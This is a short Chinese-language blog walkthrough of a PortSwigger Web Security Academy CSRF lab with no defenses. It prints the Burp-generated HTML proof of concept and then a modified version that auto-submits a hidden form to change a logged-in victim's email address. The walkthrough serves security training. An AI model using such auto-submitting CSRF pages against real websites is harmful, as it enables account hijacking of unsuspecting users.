burpsuite靶场----CSRF----无防御

burpsuite靶场----CSRF----无防御

靶场地址

https://portswigger.net/web-security/csrf/lab-no-defenses

正式开始

1.登录

2.更改email,抓包
3.创建poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a8d005f0443d44d83824cd500020014.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;normal&#45;user&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

需要稍微改正一下(填上自动提交 <script>document.forms[0].submit();</script>)

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a8d005f0443d44d83824cd500020014.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;normal&#45;evil&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
  <script>document.forms[0].submit();</script>
  </body>
</html>

4.点击上方的exploit server 然后发送payload

posted @ 2023-10-13 09:15  BattleofZhongDinghe  阅读(119)  评论(0编辑  收藏  举报